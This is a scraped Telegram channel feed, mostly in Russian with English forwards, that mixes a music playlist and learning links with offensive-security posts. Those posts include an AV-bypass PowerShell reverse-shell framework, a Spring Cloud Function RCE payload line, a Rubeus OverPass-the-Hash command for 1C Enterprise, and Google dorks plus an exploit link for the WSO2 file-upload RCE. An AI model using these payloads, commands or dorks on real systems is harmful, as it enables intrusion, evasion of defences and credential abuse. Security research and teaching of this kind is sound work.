Хочу поделиться плейлистом который в последнее время у меня на репите.
Massive Attack + Portishead + Morcheeba = кайф!
https://www.youtube.com/watch?v=_gozzJ5Yjsc
Massive Attack + Portishead + Morcheeba = кайф!
https://www.youtube.com/watch?v=_gozzJ5Yjsc
YouTube
Massive Attack • Morcheeba • Portishead - Special Coffeeshop Selection [Seven Beats Music]
🌐 Help the channel by checking out these:
⭐️Get Your 100 € Coupon Bundle Now! Click here 👉 https://temu.to/k/ejki2rs6ax0
or Search ale198885 on the Temu App for a 💰30% off discount!
🎵 Coffeeshop Collection Spotify Playlist: https://spoti.fi/3vxXNAM
You…
⭐️Get Your 100 € Coupon Bundle Now! Click here 👉 https://temu.to/k/ejki2rs6ax0
or Search ale198885 on the Temu App for a 💰30% off discount!
🎵 Coffeeshop Collection Spotify Playlist: https://spoti.fi/3vxXNAM
You…
Forwarded from white2hack 📚
OWASP_Руководство_по_тестированию_веб_безопасности_by_Кири_Э_.pdf
9.9 MB
OWASP. Руководство по тестированию веб-безопасности, автор Эйон Кири, 2020, перевод на русский осуществлен Condor (Александр)
Большое количество книг на разные темы от выживания до секретов резьбы по дереву
Forwarded from APT
PSSW100AVB
This is the PSSW100AVB (Powershell Scripts With 100% AV Bypass) Framework.
A list of useful Powershell scripts with 100% AV bypass ratio. (At the time of publication).
Latest Reverse shell tested on Windows 11 (ReverseShell_2022_03.ps1)
https://github.com/tihanyin/PSSW100AVB
#av #evasion #amsi #powershell #ps1
This is the PSSW100AVB (Powershell Scripts With 100% AV Bypass) Framework.
A list of useful Powershell scripts with 100% AV bypass ratio. (At the time of publication).
Latest Reverse shell tested on Windows 11 (ReverseShell_2022_03.ps1)
https://github.com/tihanyin/PSSW100AVB
#av #evasion #amsi #powershell #ps1
👍1
Forwarded from APT
SpringShell: Spring Core RCE
(CVE-2022-22963)
PoC Payload:
https://www.cyberkendra.com/2022/03/springshell-rce-0-day-vulnerability.html
Exploit:
https://github.com/craig/SpringCore0day
(CVE-2022-22963)
PoC Payload:
spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("xcalc")
Research:https://www.cyberkendra.com/2022/03/springshell-rce-0-day-vulnerability.html
Exploit:
https://github.com/craig/SpringCore0day
Forwarded from APT
OverPass-the-Hash in 1C Enterprise
To gain access to 1C Enterprise, you need a username and password. In case 1C works with LDAP authentication and you only have the user's NTLM hash, you can use Rubeus to launch 1C using the OverPass-the-Hash attack. Thus, you can access 1C Enterprise without having a password in the plaintext.
If the compromised user has permissions to run "External data processors", you can get a reverse shell of the 1C server.
https://github.com/KraudSecurity/1C-Exploit-Kit/tree/master/1C-Shell
#1c #pth #rubeus #ad
To gain access to 1C Enterprise, you need a username and password. In case 1C works with LDAP authentication and you only have the user's NTLM hash, you can use Rubeus to launch 1C using the OverPass-the-Hash attack. Thus, you can access 1C Enterprise without having a password in the plaintext.
Invoke-Rubeus -Command "asktgt /user:i.ivanov /domain:APTNOTES.LOCAL /rc4:A87F3A337D73085C45F9416BE5787D86 /createnetonly:C:\1cestart.exe /show"
Bonus:If the compromised user has permissions to run "External data processors", you can get a reverse shell of the 1C server.
https://github.com/KraudSecurity/1C-Exploit-Kit/tree/master/1C-Shell
#1c #pth #rubeus #ad
CrowdSec - незаметное перенапревление зловредного траффика подальше в лес, к заранее приготовленным медовым ульям👺 🐝🐝🐝
#soc #blueteam #defensive
https://youtu.be/2OEDFCo1VXY
#soc #blueteam #defensive
https://youtu.be/2OEDFCo1VXY
YouTube
Ippsecs First Look and Setting up CrowdSec - Stealthfully Forward Malicious Users to Honeypots
00:00 - Intro talking about crowdsec and its multiplayer firewall
01:04 - Showing my setup, 3 web servers, 2 attack servers
02:20 - Installing Crowdsec
03:30 - Going over the command line interface, CSCLI showing decisions
04:10 - Showing descisions -a to…
01:04 - Showing my setup, 3 web servers, 2 attack servers
02:20 - Installing Crowdsec
03:30 - Going over the command line interface, CSCLI showing decisions
04:10 - Showing descisions -a to…
Для тех кто ищет какой то особый «супер секретный путь в мир хакинга» посмотрите это видео.
Вкратце, нет никакого пути - изучай всё что тебе интересно & have fun! 😉
https://www.youtube.com/watch?v=2TofunAI6fU
Вкратце, нет никакого пути - изучай всё что тебе интересно & have fun! 😉
https://www.youtube.com/watch?v=2TofunAI6fU
YouTube
The Secret step-by-step Guide to learn Hacking
totally clickbait. but also not clickbait. I don't know where to start hacking, there is no guide to learn this stuff. But I hope you still have a plan now!
Get the LiveOverflow Font: https://shop.liveoverflow.com (advertisement)
Checkout: https://live…
Get the LiveOverflow Font: https://shop.liveoverflow.com (advertisement)
Checkout: https://live…
👍2❤1
Forwarded from APT
This media is not supported in your browser
VIEW IN TELEGRAM
WSO2 RCE (CVE-2022-29464)
Critical vulnerability on WSO2 discovered by Orange Tsai. the vulnerability is an unauthenticated unrestricted arbitrary file upload which which allows unauthenticated attackers to gain RCE on WSO2 servers via uploading malicious JSP files.
Google Dorks:
#wso2 #rce #exploit
Critical vulnerability on WSO2 discovered by Orange Tsai. the vulnerability is an unauthenticated unrestricted arbitrary file upload which which allows unauthenticated attackers to gain RCE on WSO2 servers via uploading malicious JSP files.
Google Dorks:
inurl:"/carbon/admin/login.jsp"https://github.com/hakivvi/CVE-2022-29464
inurl:"/authenticationendpoint/login.do"
inurl:"devportal/apis"
intitle:"API Publisher- Login"
intitle:"WSO2 Management Console"
#wso2 #rce #exploit